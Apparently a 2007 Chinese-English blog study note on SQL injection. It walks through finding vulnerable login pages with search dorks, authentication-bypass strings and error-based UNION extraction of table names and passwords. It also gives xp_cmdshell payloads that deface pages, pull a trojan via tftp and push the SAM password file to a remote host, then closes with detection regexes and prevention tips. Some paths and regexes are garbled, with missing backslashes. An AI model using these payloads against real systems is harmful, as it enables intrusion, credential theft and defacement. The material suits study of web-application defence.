sql injection

sql injection
it is a technique of injecting sql commands to exploit non-validated input
也稱資料隱碼攻擊,攻擊者
在輸入的字串中夾帶非法的SQL指令,就可讓資料庫誤認為是合法的SQL指令而執行


.........................................

steps for performing sql injection
1先找到輸入點
ex:用google搜尋 login.asp site:com.tw
2看原始碼決定要使用get或post方式注入
3測試是否有漏洞
根據不同的database執行query動作
ex:use a single quotation mark ( ' )
4 注入不合法的sql指令

ps:
在microsoft上,若輸入( ' )時出現OLE DB error,表示the website is vulnerable to an sql injection attack
.........................................

sql injection techniques:
authorization bypass:
using the select command:挖資料
using the insert command:注入相關惡意資料
using sql server stored procedures
ps:stored procedures are used when the backend database is ms sql server

authorization bypass:
sql如下
select username from employee where username=value1 and password=value2
正常操作如下
 username= ray
 password= ray
 產生以下sql
 select username from employee where username=ray and password=ray
攻擊操作如下
  username= ray' or 1=1 --
 password= ray' or 1=1-
 產生以下sql
  select username from employee where username= ray' or 1=1-- and password=ray' or 1=1-
 等同於
 select username from employee where username= ray or 1=1-

using the insert command
sql如下
insert into tablename values (value1,value2,value3);
正常操作如下
insert into tablename values ("data1","data2","data3");
攻擊行為如下
insert into tablename values ("+(select top 1 fieldname from tablename) + ",'ray@ray.com',"222-222-2222");

...

test sql injection vulnerability
依據不同source code寫法有以下不同的對應方式
' or 1=1--
" or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a)

use a "single quote" in the input
以blah' or 1=1為例,做法大致如下
在表單如下
login:blah' or 1=1--
password:blah' or 1=1--
在url如下
http://search/index.asp?id=blah' or 1=1--

...

executing operating system commands
使用stored procedures such as master..xp_cmdshell
語法如下
blah' ; exec master..xp_cmdshell "insert os command"
ps:若single quote無法運作可使用double quote
ex:
ping a server
blah' ; exec master..xp_cmdshell "ping 10.1.2.3" --
list the directory file
blah' ; exec master..xp_cmdshell "dir c:*.*/s > c:directory.txt" --
create a file
blah' ; exec master..xp_cmdshell "echo hello > c:hello.txt" --
defacing a web page
blah' ; exec master..xp_cmdshell "echo you-are-defaced > c:inetpubwwwrootindex.htm" --
execute non-gui applications
blah' ; exec master..xp_cmdshell "cmd.exe /c appname.exe" --
upload a trojan to the server
blah' ; exec master..xp_cmdshell "tftp -i 10.1.2.3 GET trojan.exe c:trojan.exe" --
download a trojan to the server
blah' ; exec master..xp_cmdshell "tftp -i 10.1.2.1 PUT c:winntrepairSAM SAM" --


.....

use sp_makewebtask to write a query into an html
sp_makewebtask是SQL Server 包含一個stored procedures
是用來得到WebShell的,主要功能就是導出資料庫中表的記錄為檔
語法如下:
blah' ; exec master..sp_makewebtask "webpage","sql command"
ex:
輸出creditcard table到網頁
blah' ; exec master..sp_makewebtask "10.10.1.4sharecreditcard.html","select * from creditcard"

.....

getting data from the database using odbc error message
使用特殊的sql query迫使MS SQL SERVER從返回的message中得到需要的資料,如table name,column name

using UNION子句
語法大致如下
http://web/page.asp?var=value "UNION subquery"
系統會產生error message,並根據UNION subquery透露相關資訊
操作大致如下
http://www.web.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES-
when the user UNIONS this string value to an integer 10,sql server makes an effort to convert a string(nvarchar)to an integer,thus it produces an error,since converting nvarchar to int is not possible.the server display the error
使用UNION子句將請求string value加入integer 10,SQL SERVER會嘗試轉換該string為integer
若無法把字符串(nvarchar)轉為整數型(int)時,系統就會產生錯誤
系統產生以下的error message
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
此error message透露出第一個table name為table1


UNION subquery範例:

讓系統在透露出第二個table name
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES WHERE TABLE_NAME NOT IN('table1')--
系統輸出error message若出現...the nvarchar value 'admin_name' to a column ... ,表示table name為admin_name

使用like執行以下語法可讓系統透露出含 login的第一個table name
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES WHERE TABLE_NAME like '%25LOGIN%25'--
系統輸出 error message若出現...the nvarchar value 'admin_login' to a column... ,表示table name為admin_login

讓系統透露出admin_login的第一個column
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
系統輸出error message若出現...the nvarchar value 'login_id' to a column ...,表示column name為login_id

讓系統透露出 admin_login的第二個column
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN('login_id')--
系統輸出error message若出現...the nvarchar value 'login_name' to a column ...,表示column name為login_name

讓系統透露出admin_login資料表的login_name的第一個值
UNION SELECT TOP 1 login_name FROM admin_login --
系統輸出error message若出現...the nvarchar value 'ray' to a column ...,表示login_name第一個值為ray

讓系統透露出admin_login資料表的 password的值,且login_name為ray
UNION SELECT TOP 1 password FROM admin_login where login_name='ray'--
系統輸出error message若出現...the nvarchar value 'ixtr3n' to a column ...,表示ray的password為ixtr3n


ps:
INFORMATION_SCHEM.TABLES:contains information about all tables in the server
.....

update/insert date into database
語法大致如下
http://web/page.asp?var=value;"update or insert sql query"
ex:
http://www.web.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'goodjob' WHERE login_name='ray' --
http://www.web.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id','loain_name','password') VALUES(123,'ray','goodjob') --


.........................................

sql injection in oracle
方法有以下
UNIONS
SUBSELECTS
DDL(data definition language)
INSERTS,UPDATES,DELETES
anonymous PL/SQL block in procedures

.........................................

sql injection in mysql
it is not easy to perform sql injection,因為無法同時下達多個指令


.........................................

attacking sql servers
方法有
SSRS
Osql-l probe
sc.exe
port scanning
use of commercial alternatives

...

SSRS(sql server resolution service)
the service is responsible for sending a response packet containing the connection details of clients who send a specially formed request
the packet contains the details necessary to connect to the desired instance,including the tcp port
使用udp 1434

SSRS buffer overflow vulnerabilities:
allow remote attackers to overwrite portions of system's memory and execute arbitrary codes

...

Osql-l probe
a command-line utility provided by microsoft with sql server 2000
allow the user to issue queries to the server
用途:list servers

...

sc.exe
the server controller command makes it possible to query servers to see if they are offering sql server services
用途:sweeping of services,查詢對方是否為sql server

.........................................

automated tools for sql injection

tool
sqldict:directory attack tool for sql server
sqlexec:using xp_cmdshell
sqlbf:sql server password auditing
sqlsmack:linux-base remote command
sql2.exe:針對早期exploit tool
sqlmap:將database back-end fingerprint,support blind sql injection
sqlninja:exploit tool
sqlier:破解密碼快
automagic sql injector:自動化sql injection
absinthe:support blind sql injection

........................................

blind sql injection
allow an unauthorized attacker to access a database server
利用回應的一些小的respose,慢慢找到相關message

countermeasures
user input要做filter

.........................................

countermeasures

使用RE過濾特殊character,包括
single quote('),double dash(--),...等

RE for detectin of sql meta characters:
/(%27)|(')|(--)|(%23)|(#)/ix

modified RE for detectin of sql meta characters:
/((%3D)|(=))[^n]*((%27)|(')|(--)|(%3B)|(;))/i
  ((%3D)|(=))[^n]* zero or more nonnewline characters
  (%27)|(')|(--)|(%3B)|(;) single-quote,quote-dash,semi-colon
RE for typical sql injection attack
/w*((%27)|(')((%6F)|o|(%4F))((%72)|r|(%52))/ix
  w*  zero or more alphanumeric or underscore characters
 (%27)|(')  single-quote or its hex equivalent
 (%6F)|o|(%4F))((%72)|r|(%52)  or大小寫和hex equivalent的組合
RE for detecting sql injection using UNION keyword:
/((%27)|('))union/ix
RE for detecting sql injection attacks on a ms sql server
/exec(s|+)+(s|x)pw+/ix
  (s|+)+ one or more whitespaces or their http encoded euqivalents
  (s|x)p the leters 'sp' or 'xp' to identify stored or extended procedures
 w+ one or more alphanumeric or underscore characters

....

preventing sql injection attacks:
minimize the privileges of database connections
disable verbose error messages
protect the system account "sa"
never trust user input
never use dynamic sql
never connect to a database using an admin-level account
do not store secrets in plain text
exceptions should divulge minimal information

...

audit source codes:
escape single quotes
input validation
reject known bad input
input bound checking
.....

tool
sql block:sql injection blocking tool
acunetix web vulnerability scanner:support xxs


2007-10-18 23:11:33發表 0000-00-00 00:00:00修改   

數據分析
程式開發
計算機組織與結構
資料結構與演算法
Database and MySql
manage tool
windows
unix-like
linux service
network
network layer3
network layer2
network WAN
network service
作業系統
數位鑑識
資訊安全解決方案
資訊安全威脅

Cisco security
Cisco network
Cisco layer3
Cisco layer2



  登入      [牛的大腦] | [單字我朋友] Powered by systw.net